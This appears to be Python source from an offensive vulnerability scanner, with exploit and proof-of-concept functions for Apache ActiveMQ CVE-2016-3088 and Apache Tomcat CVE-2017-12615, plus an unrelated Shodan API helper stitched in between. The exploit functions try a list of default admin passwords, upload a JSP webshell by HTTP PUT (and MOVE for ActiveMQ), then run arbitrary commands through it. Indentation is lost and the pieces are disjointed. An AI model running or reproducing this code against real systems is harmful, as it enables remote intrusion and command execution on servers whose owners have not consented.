def cve_2016_3088_exp(self, cmd):
self.threadLock.acquire()
vul_name = "Apache AcitveMQ: CVE-2016-3088"
self.path = "null"
self.name = random_md5()
self.webshell = "/" + self.name + ".jsp"
self.exp = self.jsp_webshell
self.passlist = [
"admin:123456", "admin:admin", "admin:123123", "admin:activemq",
"admin:12345678"
]
try:
for self.pa in self.passlist:
self.base64_p = base64.b64encode(str.encode(self.pa))
self.p = self.base64_p.decode('utf-8')
self.headers_base64 = {
'User-Agent': self.ua,
'Authorization': 'Basic ' + self.p
}
url = urljoin(self.url, "/admin/test/systemProperties.jsp")
self.request = requests.get(url,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.request.status_code == 200:
self.path = \
re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
break
self.request = requests.put(self.url + "/fileserver/v.txt",
headers=self.headers_base64,
data=self.exp,
timeout=self.timeout,
verify=False)
self.headers_move = {
'User-Agent':
self.ua,
'Destination':
'file://' + self.path + '/webapps/api' + self.webshell
}
self.request = requests.request("MOVE",
self.url + "/fileserver/v.txt",
headers=self.headers_move,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.request = requests.get(self.url + "/api" + self.webshell +
"?pwd=password&cmd=" + cmd,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n"
self.r += self.request.text
verify.exploit_print(self.r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2017_12615_exp(self, cmd):
vul_name = "Apache Tomcat: CVE-2017-12615"
self.name = random_md5()
self.webshell = "/" + self.name + ".jsp/"
self.payload1 = self.name
self.payload2 = self.payload_cve_2017_12615
try:
self.req = requests.put(self.url + self.webshell,
data=self.payload2,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.urlcmd = self.url + "/" + self.name + ".jsp?pwd=password&cmd=" + cmd
self.request = requests.get(self.urlcmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.r = "Put Webshell: " + self.urlcmd + "\n-------------------------\n" + self.request.text
raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2017_12615_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Tomcat: CVE-2017-12615"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Tomcat PUT 方法任意文件上传"
self.vul_info["vul_numb"] = "CVE-2017-12615"
self.vul_info["vul_apps"] = "Tomcat"
self.vul_info["vul_date"] = "2017-09-20"
self.vul_info["vul_vers"] = "7.0.0 - 7.0.81"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件上传"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Tomcat如果开启PUT方法支持则可能存在远程代码执行漏洞,漏洞编号为CVE-2017-12615。" \
"攻击者可以在使用该漏洞上传JSP文件,从而导致远程代码执行。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
self.name = random_md5()
key = random_md5()
self.webshell = "/" + self.name + ".jsp/"
self.payload1 = key
self.payload2 = self.payload_cve_2017_12615
try:
self.request = requests.put(self.url + self.webshell,
data=self.payload1,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.request = requests.get(self.url + self.webshell[:-1],
headers=self.headers,
timeout=self.timeout,
verify=False)
if key in self.request.text:
self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = self.url + "/" + self.name + ".jsp"
self.vul_info[
"prt_info"] = "[url: " + self.url + "/" + self.name + ".jsp ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def api_request(key,
function,
params=None,
data=None,
base_url='https://api.shodan.io',
method='get',
retries=1,
proxies=None):
"""General-purpose function to create web requests to SHODAN.
Arguments:
function -- name of the function you want to execute
params -- dictionary of parameters for the function
proxies -- a proxies array for the requests library
Returns
A dictionary containing the function's results.
"""
# Add the API key parameter automatically
params['key'] = key
# Send the request
tries = 0
error = False
while tries <= retries:
try:
if method.lower() == 'post':
data = requests.post(
base_url + function,
json.dumps(data),
params=params,
headers={'content-type': 'application/json'},
proxies=proxies)
elif method.lower() == 'delete':
data = requests.delete(base_url + function,
params=params,
proxies=proxies)
elif method.lower() == 'put':
data = requests.put(base_url + function,
params=params,
proxies=proxies)
else:
data = requests.get(base_url + function,
params=params,
proxies=proxies)
# Exit out of the loop
break
except Exception:
error = True
tries += 1
if error and tries >= retries:
raise APIError('Unable to connect to Shodan')
# Check that the API key wasn't rejected
if data.status_code == 401:
try:
raise APIError(data.json()['error'])
except (ValueError, KeyError):
pass
raise APIError('Invalid API key')
# Parse the text into JSON
try:
data = data.json()
except Exception:
raise APIError('Unable to parse JSON response')
# Raise an exception if an error occurred
if type(data) == dict and data.get('error', None):
raise APIError(data['error'])
# Return the data
return data
def cve_2016_3088_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2016-3088"
self.vul_info["vul_apps"] = "AcitveMQ"
self.vul_info["vul_date"] = "2016-03-10"
self.vul_info["vul_vers"] = "< 5.14.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录"
self.vul_info["cre_date"] = "2021-01-07"
self.vul_info["cre_auth"] = "zhzyker"
self.rawdata = None
self.path = "null"
self.name = random_md5()[:-20]
self.webshell = "/" + self.name + ".jsp"
self.poc = random_md5()
self.exp = self.jsp_webshell
self.passlist = [
"admin:123456", "admin:admin", "admin:123123", "admin:activemq",
"admin:12345678"
]
try:
try:
for self.pa in self.passlist:
self.base64_p = base64.b64encode(str.encode(self.pa))
self.p = self.base64_p.decode('utf-8')
self.headers_base64 = {
'User-Agent': self.ua,
'Authorization': 'Basic ' + self.p
}
url = urljoin(self.url, "/admin/test/systemProperties.jsp")
self.request = requests.get(url,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.request.status_code == 200:
self.path = \
re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
break
except IndexError:
pass
self.request = requests.put(self.url + "/fileserver/v.txt",
headers=self.headers_base64,
data=self.poc,
timeout=self.timeout,
verify=False)
self.headers_move = {
'User-Agent':
self.ua,
'Destination':
'file://' + self.path + '/webapps/api' + self.webshell
}
self.request = requests.request("MOVE",
self.url + "/fileserver/v.txt",
headers=self.headers_move,
timeout=self.timeout,
verify=False)
self.request = requests.get(self.url + "/api" + self.webshell,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.poc in self.request.text:
self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell
self.vul_info[
"prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]"
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()